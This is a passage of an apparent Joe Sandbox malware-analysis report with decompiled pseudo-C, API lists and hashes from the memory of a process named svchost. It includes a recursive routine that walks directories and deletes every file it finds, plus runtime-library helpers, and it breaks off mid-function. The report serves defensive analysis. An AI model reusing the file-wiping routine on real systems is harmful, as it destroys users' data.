                              • Part of subcall function 00BD09EB: GetLastError.KERNEL32(?,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?,?), ref: 00BD0A13
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorFreeHeapLast_free
                            • String ID:
                            • API String ID: 1353095263-0
                            • Opcode ID: ba0eaaabaece19fd87c933251771ca8d68957359310cc235be6b375e1344e05b
                            • Instruction ID: b1ddf7891d2aa927720edd7bb6806f40d726b3a8ca20561b5e05af0b2614a8b5
                            • Opcode Fuzzy Hash: ba0eaaabaece19fd87c933251771ca8d68957359310cc235be6b375e1344e05b
                            • Instruction Fuzzy Hash: DAE092761113059F8720CF6DD400A86F7E4EF95721720892BE89DD3710E331E812CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BDBA5E, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00BDBA5E(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
				void* _t10;

				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
				return _t10;
			}




                            0x00bdba7b
                            0x00bdba82

                            APIs
                            • CreateFileW.KERNELBASE(00000000,00000000,?,00BDBDC8,?,?,00000000,?,00BDBDC8,00000000,0000000C), ref: 00BDBA7B
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 0f0379c88d42d7e089d2f871db34dca2536e7dac28ce646b8e42097dde967d91
                            • Instruction ID: e6c2dc39c6a3e5e5a840c712e2216bd12e6a74069c8087d7a4322ccfe7085d00
                            • Opcode Fuzzy Hash: 0f0379c88d42d7e089d2f871db34dca2536e7dac28ce646b8e42097dde967d91
                            • Instruction Fuzzy Hash: 1DD06C3201014DBBDF029F84ED46EDA3BAAFB48714F014100BA1856020C776E861AB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC40E0, Relevance: 1.4, APIs: 1, Instructions: 198sleepCOMMON
                            Download Yara Rule
                            C-Code - Quality: 54%
                            			E00BC40E0(void* __edx, char* _a4, void _a560, char _a596, char _a1120, char _a9320, char _a13424, signed int _a21628) {
				void _v0;
				void* _v4;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t57;
				signed int _t62;
				char _t63;
				signed int _t64;
				intOrPtr _t65;
				char _t66;
				void* _t69;
				void* _t71;
				void* _t73;
				void* _t76;
				signed int _t79;
				signed int _t80;
				void* _t82;
				signed int _t83;
				signed int _t84;
				void _t86;
				void _t87;
				void* _t90;
				void* _t91;
				intOrPtr _t98;
				char _t99;
				char* _t101;
				signed int _t103;
				short _t105;
				void* _t106;
				char* _t113;
				intOrPtr* _t114;
				signed int _t116;
				void* _t121;
				signed int _t122;
				void* _t123;
				intOrPtr* _t126;
				void* _t135;
				intOrPtr* _t141;
				void* _t142;
				signed int _t146;
				signed int _t147;
				void* _t148;
				void* _t149;
				void* _t151;
				void* _t153;
				void* _t154;
				void* _t156;

				_t121 = __edx;
				_t147 = _t146 & 0xfffffff8;
				E00BC7880();
				_t57 =  *0xbec008; // 0xdc55bb75
				_a21628 = _t57 ^ _t147;
				_push(_t142);
				E00BC4BF0( &_a13424, _a4, 0x1000);
				_t148 = _t147 + 0xc;
				_t105 = 0;
				goto L1;
				do {
					L3:
					_t63 =  *_t101;
					_t101 = _t101 + 2;
				} while (_t63 != 0);
				_t103 = _t101 - _t106 >> 1;
				_t64 =  *(_t148 + 0x46e + _t103 * 2) & 0x0000ffff;
				if(_t64 == 0x2f || _t64 == 0x5c) {
					L9:
					_t126 =  &_a1120 + 0xfffffffe;
					do {
						_t65 =  *((intOrPtr*)(_t126 + 2));
						_t126 = _t126 + 2;
					} while (_t65 != 0);
					_t66 = "*"; // 0x2a
					 *_t126 = _t66;
					_push( &_v0);
					_t69 = E00BCE54C(_t103, _t121, _t126, _t142,  &_a1120); // executed
					_t149 = _t148 + 8;
					_v4 = _t69;
					if(_t69 == 0xffffffff) {
						L40:
						_t71 = E00BCE238( &_a13424); // executed
						E00BC786A();
						return _t71;
					}
					_t151 = _t149 - 0x230;
					_t73 = memcpy(_t151,  &_v0, 0x8c << 2);
					_push(_t103);
					_push(_t73);
					E00BC45C0();
					_push( &_v0);
					_t76 = E00BCE557(_t103, _t121,  &_v0, _v4); // executed
					_t153 = _t151 + 0x24c;
					if(_t76 != 0) {
						L39:
						E00BCE526(_v4);
						_t149 = _t153 + 4;
						goto L40;
					}
					do {
						_t145 =  &_v0;
						memcpy( &_a560,  &_v0, 0x8c << 2);
						_t154 = _t153 + 0xc;
						_t113 = ".";
						_t79 =  &_a596;
						while(1) {
							_t122 =  *_t79;
							if(_t122 !=  *_t113) {
								break;
							}
							if(_t122 == 0) {
								L19:
								_t80 = 0;
								L21:
								if(_t80 == 0) {
									goto L38;
								}
								_t83 = L"..";
								_t114 =  &_a596;
								while(1) {
									_t122 =  *_t114;
									if(_t122 !=  *_t83) {
										break;
									}
									if(_t122 == 0) {
										L27:
										_t84 = 0;
										L29:
										if(_t84 == 0) {
											goto L38;
										}
										_t123 =  &_a596;
										 *((short*)(_t154 + 0x470 + _t103 * 2)) = 0;
										_t145 = _t123;
										do {
											_t86 =  *_t123;
											_t123 = _t123 + 2;
										} while (_t86 != 0);
										_t122 = _t123 - _t145;
										_t135 =  &_a1120 + 0xfffffffe;
										do {
											_t87 =  *(_t135 + 2);
											_t135 = _t135 + 2;
										} while (_t87 != 0);
										_t116 = _t122 >> 2;
										memcpy(_t135, _t145, _t116 << 2);
										_t90 = memcpy(_t145 + _t116 + _t116, _t145, _t122 & 0x00000003);
										_t156 = _t154 + 0x18;
										if((_v0 & 0x00000010) == 0) {
											_t91 = E00BCEF70(_t90); // executed
											_t154 = _t156 + 4;
											if(_t91 != 0) {
												Sleep(0x64);
												E00BCEF70( &_a1120);
												_t154 = _t154 + 4;
											}
										} else {
											E00BC4C90( &_a9320, _t90, 0x1000);
											_push( &_a9320); // executed
											E00BC40E0(_t122); // executed
											_t154 = _t156 + 0x10;
										}
										goto L38;
									}
									_t122 =  *((intOrPtr*)(_t114 + 2));
									_t36 = _t83 + 2; // 0x2e
									if(_t122 !=  *_t36) {
										break;
									}
									_t114 = _t114 + 4;
									_t83 = _t83 + 4;
									if(_t122 != 0) {
										continue;
									}
									goto L27;
								}
								asm("sbb eax, eax");
								_t84 = _t83 | 0x00000001;
								goto L29;
							}
							_t122 =  *((intOrPtr*)(_t79 + 2));
							_t33 =  &(_t113[2]); // 0x2e0000
							if(_t122 !=  *_t33) {
								break;
							}
							_t79 = _t79 + 4;
							_t113 =  &(_t113[4]);
							if(_t122 != 0) {
								continue;
							}
							goto L19;
						}
						asm("sbb eax, eax");
						_t80 = _t79 | 0x00000001;
						goto L21;
						L38:
						_push( &_v0);
						_t82 = E00BCE557(_t103, _t122, _t145, _v4); // executed
						_t153 = _t154 + 8;
					} while (_t82 == 0);
					goto L39;
				} else {
					_t141 =  &_a1120 + 0xfffffffe;
					do {
						_t98 =  *((intOrPtr*)(_t141 + 2));
						_t141 = _t141 + 2;
					} while (_t98 != 0);
					_t99 = "\\"; // 0x5c
					_t103 = _t103 + 1;
					 *_t141 = _t99;
					goto L9;
				}
				L1:
				_t62 =  *(_t148 + _t105 + 0x3480) & 0x0000ffff;
				_t105 = _t105 + 2;
				 *(_t148 + _t105 + 0x46e) = _t62;
				if(_t62 != 0) {
					goto L1;
				} else {
					_t101 =  &_a1120;
					_t106 = _t101 + 2;
					goto L3;
				}
			}



















































                            0x00bc40e0
                            0x00bc40e3
                            0x00bc40eb
                            0x00bc40f0
                            0x00bc40f7
                            0x00bc4102
                            0x00bc4112
                            0x00bc4117
                            0x00bc411a
                            0x00bc411a
                            0x00bc4142
                            0x00bc4142
                            0x00bc4142
                            0x00bc4145
                            0x00bc4148
                            0x00bc414f
                            0x00bc4151
                            0x00bc415c
                            0x00bc4184
                            0x00bc418b
                            0x00bc4190
                            0x00bc4190
                            0x00bc4194
                            0x00bc4197
                            0x00bc419c
                            0x00bc41a1
                            0x00bc41a7
                            0x00bc41b0
                            0x00bc41b5
                            0x00bc41b8
                            0x00bc41bf
                            0x00bc4367
                            0x00bc436f
                            0x00bc4383
                            0x00bc438b
                            0x00bc438b
                            0x00bc41c5
                            0x00bc41e0
                            0x00bc41e2
                            0x00bc41e3
                            0x00bc41e4
                            0x00bc41f0
                            0x00bc41f8
                            0x00bc41fd
                            0x00bc4205
                            0x00bc435b
                            0x00bc435f
                            0x00bc4364
                            0x00000000
                            0x00bc4364
                            0x00bc4210
                            0x00bc4215
                            0x00bc4220
                            0x00bc4220
                            0x00bc4222
                            0x00bc4227
                            0x00bc4230
                            0x00bc4230
                            0x00bc4236
                            0x00000000
                            0x00000000
                            0x00bc423b
                            0x00bc4252
                            0x00bc4252
                            0x00bc425b
                            0x00bc425d
                            0x00000000
                            0x00000000
                            0x00bc4263
                            0x00bc4268
                            0x00bc4270
                            0x00bc4270
                            0x00bc4276
                            0x00000000
                            0x00000000
                            0x00bc427b
                            0x00bc4292
                            0x00bc4292
                            0x00bc429b
                            0x00bc429d
                            0x00000000
                            0x00000000
                            0x00bc42a5
                            0x00bc42ac
                            0x00bc42b4
                            0x00bc42b6
                            0x00bc42b6
                            0x00bc42b9
                            0x00bc42bc
                            0x00bc42c8
                            0x00bc42ca
                            0x00bc42d0
                            0x00bc42d0
                            0x00bc42d4
                            0x00bc42d7
                            0x00bc42e5
                            0x00bc42e8
                            0x00bc42f4
                            0x00bc42f4
                            0x00bc42f6
                            0x00bc431e
                            0x00bc4323
                            0x00bc4328
                            0x00bc432c
                            0x00bc433a
                            0x00bc433f
                            0x00bc433f
                            0x00bc42f8
                            0x00bc4306
                            0x00bc4312
                            0x00bc4313
                            0x00bc4318
                            0x00bc4318
                            0x00000000
                            0x00bc42f6
                            0x00bc427d
                            0x00bc4281
                            0x00bc4285
                            0x00000000
                            0x00000000
                            0x00bc4287
                            0x00bc428a
                            0x00bc4290
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bc4290
                            0x00bc4296
                            0x00bc4298
                            0x00000000
                            0x00bc4298
                            0x00bc423d
                            0x00bc4241
                            0x00bc4245
                            0x00000000
                            0x00000000
                            0x00bc4247
                            0x00bc424a
                            0x00bc4250
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bc4250
                            0x00bc4256
                            0x00bc4258
                            0x00000000
                            0x00bc4342
                            0x00bc4346
                            0x00bc434b
                            0x00bc4350
                            0x00bc4353
                            0x00000000
                            0x00bc4163
                            0x00bc416a
                            0x00bc4170
                            0x00bc4170
                            0x00bc4174
                            0x00bc4177
                            0x00bc417c
                            0x00bc4181
                            0x00bc4182
                            0x00000000
                            0x00bc4182
                            0x00bc4120
                            0x00bc4120
                            0x00bc4128
                            0x00bc412b
                            0x00bc4136
                            0x00000000
                            0x00bc4138
                            0x00bc4138
                            0x00bc413f
                            0x00000000
                            0x00bc413f

                            APIs
                              • Part of subcall function 00BC4BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,00BC4117,?,?,00001000), ref: 00BC4C08
                              • Part of subcall function 00BCEF70: DeleteFileW.KERNELBASE(?,?,00BC46DC,?,?,?), ref: 00BCEF78
                              • Part of subcall function 00BCEF70: GetLastError.KERNEL32(?,?), ref: 00BCEF82
                              • Part of subcall function 00BCEF70: __dosmaperr.LIBCMT ref: 00BCEF89
                            • Sleep.KERNEL32(00000064), ref: 00BC432C
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharDeleteErrorFileLastMultiSleepWide__dosmaperr
                            • String ID:
                            • API String ID: 762390858-0
                            • Opcode ID: d87a8b59973b7f55744b8c86660648f942d37a9b8b7e5f8b0c0d5ef100e9dc50
                            • Instruction ID: 8da24446f374171c91feae6739bae7b9738cc6a15184f892f737a31a444e4053
                            • Opcode Fuzzy Hash: d87a8b59973b7f55744b8c86660648f942d37a9b8b7e5f8b0c0d5ef100e9dc50
                            • Instruction Fuzzy Hash: 2F6127754043428BC720EB64D852FEBB3E9FFA1348F4409ACE9999B190FB31EA45C756
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 00BD61F0, Relevance: 27.4, APIs: 18, Instructions: 419COMMON
                            Download Yara Rule
                            C-Code - Quality: 84%
                            			E00BD61F0(void* __edx, signed int _a4, signed int _a8) {
				signed int _v0;
				signed char _v5;
				intOrPtr _v8;
				signed char _v9;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				signed int _v92;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t116;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t127;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				void* _t143;
				signed int _t148;
				signed int* _t150;
				signed int* _t156;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				intOrPtr _t168;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				signed int _t180;
				signed int _t185;
				intOrPtr* _t186;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t204;
				intOrPtr* _t205;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t221;
				signed int _t223;
				intOrPtr _t225;
				void* _t231;
				signed int _t233;
				void* _t236;
				signed int _t237;
				signed int _t238;
				void* _t241;
				signed int _t244;
				signed int _t246;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr* _t271;
				signed int _t274;
				signed int _t276;
				signed int _t280;
				signed int _t282;
				void* _t283;
				void* _t284;
				void* _t285;
				void* _t286;
				signed int _t287;
				signed int _t289;
				signed int _t291;
				signed int _t292;
				signed int* _t293;
				signed int _t299;
				signed int _t300;
				CHAR* _t301;
				signed int _t303;
				signed int _t304;
				WCHAR* _t305;
				signed int _t306;
				signed int _t307;
				signed int* _t308;
				signed int _t309;
				signed int _t311;
				void* _t317;
				void* _t318;
				void* _t319;
				void* _t321;
				void* _t322;
				void* _t323;
				void* _t324;

				_t283 = __edx;
				_t217 = _a4;
				if(_t217 != 0) {
					_t287 = _t217;
					_t116 = E00BC8680(_t217, 0x3d);
					_v16 = _t116;
					_t231 = _t286;
					__eflags = _t116;
					if(_t116 == 0) {
						L10:
						 *((intOrPtr*)(E00BCC9CE())) = 0x16;
						goto L11;
					} else {
						__eflags = _t116 - _t217;
						if(_t116 == _t217) {
							goto L10;
						} else {
							__eflags =  *((char*)(_t116 + 1));
							_t299 =  *0xbf60bc; // 0xe016f8
							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
							_v5 = _t120;
							__eflags = _t299 -  *0xbf60c8; // 0xe19f50
							if(__eflags == 0) {
								L87();
								_t299 = _t120;
								_t120 = _v5;
								_t231 = _t299;
								 *0xbf60bc = _t299;
							}
							_t218 = 0;
							__eflags = _t299;
							if(_t299 != 0) {
								L21:
								_t233 = _t287;
								_t122 = _v16 - _t233;
								_push(_t122);
								_push(_t233);
								L121();
								_v12 = _t122;
								__eflags = _t122;
								if(_t122 < 0) {
									L29:
									__eflags = _v5 - _t218;
									if(_v5 != _t218) {
										goto L12;
									} else {
										_t123 =  ~_t122;
										_v12 = _t123;
										_t27 = _t123 + 2; // 0x2
										_t236 = _t27;
										__eflags = _t236 - _t123;
										if(_t236 < _t123) {
											goto L11;
										} else {
											__eflags = _t236 - 0x3fffffff;
											if(_t236 >= 0x3fffffff) {
												goto L11;
											} else {
												_push(4);
												_push(_t236);
												_t300 = E00BD850F(_t299);
												E00BD09EB(_t218);
												_t321 = _t321 + 0x10;
												__eflags = _t300;
												if(_t300 == 0) {
													goto L11;
												} else {
													_t237 = _v12;
													_t287 = _t218;
													_t126 = _a4;
													 *(_t300 + _t237 * 4) = _t126;
													 *(_t300 + 4 + _t237 * 4) = _t218;
													goto L34;
												}
											}
										}
									}
								} else {
									__eflags =  *_t299 - _t218;
									if( *_t299 == _t218) {
										goto L29;
									} else {
										E00BD09EB( *((intOrPtr*)(_t299 + _t122 * 4)));
										_t282 = _v12;
										__eflags = _v5 - _t218;
										if(_v5 != _t218) {
											while(1) {
												__eflags =  *(_t299 + _t282 * 4) - _t218;
												if( *(_t299 + _t282 * 4) == _t218) {
													break;
												}
												 *(_t299 + _t282 * 4) =  *(_t299 + 4 + _t282 * 4);
												_t282 = _t282 + 1;
												__eflags = _t282;
											}
											_push(4);
											_push(_t282);
											_t300 = E00BD850F(_t299);
											E00BD09EB(_t218);
											_t321 = _t321 + 0x10;
											_t126 = _t287;
											__eflags = _t300;
											if(_t300 != 0) {
												L34:
												 *0xbf60bc = _t300;
											}
										} else {
											_t126 = _a4;
											_t287 = _t218;
											 *(_t299 + _t282 * 4) = _t126;
										}
										__eflags = _a8 - _t218;
										if(_a8 == _t218) {
											goto L12;
										} else {
											_t238 = _t126;
											_t284 = _t238 + 1;
											do {
												_t127 =  *_t238;
												_t238 = _t238 + 1;
												__eflags = _t127;
											} while (_t127 != 0);
											_v12 = _t238 - _t284 + 2;
											_t301 = E00BD0B10(_t238 - _t284, _t238 - _t284 + 2, 1);
											_pop(_t241);
											__eflags = _t301;
											if(_t301 == 0) {
												L42:
												E00BD09EB(_t301);
												goto L12;
											} else {
												_t131 = E00BD0A73(_t301, _v12, _a4);
												_t322 = _t321 + 0xc;
												__eflags = _t131;
												if(_t131 != 0) {
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													E00BD1798();
													asm("int3");
													_t317 = _t322;
													_t323 = _t322 - 0xc;
													_push(_t218);
													_t220 = _v44;
													__eflags = _t220;
													if(_t220 != 0) {
														_push(_t301);
														_push(_t287);
														_push(0x3d);
														_t289 = _t220;
														_t133 = E00BC88E7(_t241);
														_v20 = _t133;
														_t244 = _t220;
														__eflags = _t133;
														if(_t133 == 0) {
															L54:
															 *((intOrPtr*)(E00BCC9CE())) = 0x16;
															goto L55;
														} else {
															__eflags = _t133 - _t220;
															if(_t133 == _t220) {
																goto L54;
															} else {
																_t303 =  *0xbf60c0; // 0xe19000
																_t221 = 0;
																__eflags =  *(_t133 + 2);
																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
																_v9 = _t246;
																__eflags = _t303 -  *0xbf60c4; // 0xe04c88
																if(__eflags == 0) {
																	_push(_t303);
																	L104();
																	_t246 = _v9;
																	_t303 = _t133;
																	 *0xbf60c0 = _t303;
																}
																__eflags = _t303;
																if(_t303 != 0) {
																	L64:
																	_v20 = _v20 - _t289 >> 1;
																	_t138 = E00BD682B(_t289, _v20 - _t289 >> 1);
																	_v16 = _t138;
																	__eflags = _t138;
																	if(_t138 < 0) {
																		L72:
																		__eflags = _v9 - _t221;
																		if(_v9 != _t221) {
																			goto L56;
																		} else {
																			_t139 =  ~_t138;
																			_v16 = _t139;
																			_t72 = _t139 + 2; // 0x2
																			_t252 = _t72;
																			__eflags = _t252 - _t139;
																			if(_t252 < _t139) {
																				goto L55;
																			} else {
																				__eflags = _t252 - 0x3fffffff;
																				if(_t252 >= 0x3fffffff) {
																					goto L55;
																				} else {
																					_push(4);
																					_push(_t252);
																					_t304 = E00BD850F(_t303);
																					E00BD09EB(_t221);
																					_t323 = _t323 + 0x10;
																					__eflags = _t304;
																					if(_t304 == 0) {
																						goto L55;
																					} else {
																						_t253 = _v16;
																						_t289 = _t221;
																						_t142 = _v0;
																						 *(_t304 + _t253 * 4) = _t142;
																						 *(_t304 + 4 + _t253 * 4) = _t221;
																						goto L77;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t303 - _t221;
																		if( *_t303 == _t221) {
																			goto L72;
																		} else {
																			E00BD09EB( *((intOrPtr*)(_t303 + _t138 * 4)));
																			_t276 = _v16;
																			__eflags = _v9 - _t221;
																			if(_v9 != _t221) {
																				while(1) {
																					__eflags =  *(_t303 + _t276 * 4) - _t221;
																					if( *(_t303 + _t276 * 4) == _t221) {
																						break;
																					}
																					 *(_t303 + _t276 * 4) =  *(_t303 + 4 + _t276 * 4);
																					_t276 = _t276 + 1;
																					__eflags = _t276;
																				}
																				_push(4);
																				_push(_t276);
																				_t304 = E00BD850F(_t303);
																				E00BD09EB(_t221);
																				_t323 = _t323 + 0x10;
																				_t142 = _t289;
																				__eflags = _t304;
																				if(_t304 != 0) {
																					L77:
																					 *0xbf60c0 = _t304;
																				}
																			} else {
																				_t142 = _v0;
																				_t289 = _t221;
																				 *(_t303 + _t276 * 4) = _t142;
																			}
																			__eflags = _a4 - _t221;
																			if(_a4 == _t221) {
																				goto L56;
																			} else {
																				_t254 = _t142;
																				_t81 = _t254 + 2; // 0x2
																				_t285 = _t81;
																				do {
																					_t143 =  *_t254;
																					_t254 = _t254 + 2;
																					__eflags = _t143 - _t221;
																				} while (_t143 != _t221);
																				_t82 = (_t254 - _t285 >> 1) + 2; // 0x0
																				_v16 = _t82;
																				_t305 = E00BD0B10(_t254 - _t285 >> 1, _t82, 2);
																				_pop(_t258);
																				__eflags = _t305;
																				if(_t305 == 0) {
																					L85:
																					E00BD09EB(_t305);
																					goto L56;
																				} else {
																					_t148 = E00BD618C(_t305, _v16, _v0);
																					_t324 = _t323 + 0xc;
																					__eflags = _t148;
																					if(_t148 != 0) {
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						E00BD1798();
																						asm("int3");
																						_push(_t317);
																						_t318 = _t324;
																						_push(_t289);
																						_t291 = _v92;
																						__eflags = _t291;
																						if(_t291 != 0) {
																							_t260 = 0;
																							_t150 = _t291;
																							__eflags =  *_t291;
																							if( *_t291 != 0) {
																								do {
																									_t150 =  &(_t150[1]);
																									_t260 = _t260 + 1;
																									__eflags =  *_t150;
																								} while ( *_t150 != 0);
																							}
																							_t93 = _t260 + 1; // 0x2
																							_t306 = E00BD0B10(_t260, _t93, 4);
																							_t262 = _t305;
																							__eflags = _t306;
																							if(_t306 == 0) {
																								L102:
																								E00BD0ACD(_t221, _t285, _t291, _t306);
																								goto L103;
																							} else {
																								__eflags =  *_t291;
																								if( *_t291 == 0) {
																									L100:
																									E00BD09EB(0);
																									_t175 = _t306;
																									goto L101;
																								} else {
																									_push(_t221);
																									_t221 = _t306 - _t291;
																									__eflags = _t221;
																									do {
																										_t271 =  *_t291;
																										_t94 = _t271 + 1; // 0x5
																										_t285 = _t94;
																										do {
																											_t176 =  *_t271;
																											_t271 = _t271 + 1;
																											__eflags = _t176;
																										} while (_t176 != 0);
																										_t262 = _t271 - _t285;
																										_t95 = _t262 + 1; // 0x6
																										_v16 = _t95;
																										 *(_t221 + _t291) = E00BD0B10(_t262, _t95, 1);
																										E00BD09EB(0);
																										_t324 = _t324 + 0xc;
																										__eflags =  *(_t221 + _t291);
																										if( *(_t221 + _t291) == 0) {
																											goto L102;
																										} else {
																											_t180 = E00BD0A73( *(_t221 + _t291), _v16,  *_t291);
																											_t324 = _t324 + 0xc;
																											__eflags = _t180;
																											if(_t180 != 0) {
																												L103:
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												E00BD1798();
																												asm("int3");
																												_push(_t318);
																												_t319 = _t324;
																												_push(_t262);
																												_push(_t262);
																												_push(_t291);
																												_t292 = _v128;
																												__eflags = _t292;
																												if(_t292 != 0) {
																													_push(_t221);
																													_t223 = 0;
																													_t156 = _t292;
																													_t263 = 0;
																													_v20 = 0;
																													_push(_t306);
																													__eflags =  *_t292;
																													if( *_t292 != 0) {
																														do {
																															_t156 =  &(_t156[1]);
																															_t263 = _t263 + 1;
																															__eflags =  *_t156;
																														} while ( *_t156 != 0);
																													}
																													_t104 = _t263 + 1; // 0x2
																													_t307 = E00BD0B10(_t263, _t104, 4);
																													__eflags = _t307;
																													if(_t307 == 0) {
																														L119:
																														E00BD0ACD(_t223, _t285, _t292, _t307);
																														goto L120;
																													} else {
																														__eflags =  *_t292 - _t223;
																														if( *_t292 == _t223) {
																															L117:
																															E00BD09EB(_t223);
																															_t167 = _t307;
																															goto L118;
																														} else {
																															_t223 = _t307 - _t292;
																															__eflags = _t223;
																															do {
																																_t267 =  *_t292;
																																_t105 = _t267 + 2; // 0x6
																																_t285 = _t105;
																																do {
																																	_t168 =  *_t267;
																																	_t267 = _t267 + 2;
																																	__eflags = _t168 - _v20;
																																} while (_t168 != _v20);
																																_t107 = (_t267 - _t285 >> 1) + 1; // 0x3
																																_v24 = _t107;
																																 *(_t223 + _t292) = E00BD0B10(_t267 - _t285 >> 1, _t107, 2);
																																E00BD09EB(0);
																																_t324 = _t324 + 0xc;
																																__eflags =  *(_t223 + _t292);
																																if( *(_t223 + _t292) == 0) {
																																	goto L119;
																																} else {
																																	_t173 = E00BD618C( *(_t223 + _t292), _v24,  *_t292);
																																	_t324 = _t324 + 0xc;
																																	__eflags = _t173;
																																	if(_t173 != 0) {
																																		L120:
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		E00BD1798();
																																		asm("int3");
																																		_push(_t319);
																																		_push(_t223);
																																		_push(_t307);
																																		_push(_t292);
																																		_t293 =  *0xbf60bc; // 0xe016f8
																																		_t308 = _t293;
																																		__eflags =  *_t293;
																																		if( *_t293 == 0) {
																																			L127:
																																			_t309 = _t308 - _t293;
																																			__eflags = _t309;
																																			_t311 =  ~(_t309 >> 2);
																																		} else {
																																			_t225 = _v8;
																																			do {
																																				_t163 = E00BDC265(_v12,  *_t308, _t225);
																																				_t324 = _t324 + 0xc;
																																				__eflags = _t163;
																																				if(_t163 != 0) {
																																					goto L126;
																																				} else {
																																					_t165 =  *((intOrPtr*)(_t225 +  *_t308));
																																					__eflags = _t165 - 0x3d;
																																					if(_t165 == 0x3d) {
																																						L129:
																																						_t311 = _t308 - _t293 >> 2;
																																					} else {
																																						__eflags = _t165;
																																						if(_t165 == 0) {
																																							goto L129;
																																						} else {
																																							goto L126;
																																						}
																																					}
																																				}
																																				goto L128;
																																				L126:
																																				_t308 =  &(_t308[1]);
																																				__eflags =  *_t308;
																																			} while ( *_t308 != 0);
																																			goto L127;
																																		}
																																		L128:
																																		return _t311;
																																	} else {
																																		goto L115;
																																	}
																																}
																																goto L130;
																																L115:
																																_t292 = _t292 + 4;
																																__eflags =  *_t292 - _t173;
																															} while ( *_t292 != _t173);
																															_t223 = 0;
																															__eflags = 0;
																															goto L117;
																														}
																													}
																												} else {
																													_t167 = 0;
																													L118:
																													return _t167;
																												}
																											} else {
																												goto L98;
																											}
																										}
																										goto L130;
																										L98:
																										_t291 = _t291 + 4;
																										__eflags =  *_t291 - _t180;
																									} while ( *_t291 != _t180);
																									goto L100;
																								}
																							}
																						} else {
																							_t175 = 0;
																							L101:
																							return _t175;
																						}
																					} else {
																						_t274 =  &(_t305[_v20 + 1]);
																						 *(_t274 - 2) = _t148;
																						asm("sbb eax, eax");
																						_t185 = SetEnvironmentVariableW(_t305,  !( ~(_v9 & 0x000000ff)) & _t274);
																						__eflags = _t185;
																						if(_t185 == 0) {
																							_t186 = E00BCC9CE();
																							_t221 = _t221 | 0xffffffff;
																							__eflags = _t221;
																							 *_t186 = 0x2a;
																						}
																						goto L85;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t191 =  *0xbf60bc; // 0xe016f8
																	__eflags = _a4 - _t221;
																	if(_a4 == _t221) {
																		L58:
																		__eflags = _t246;
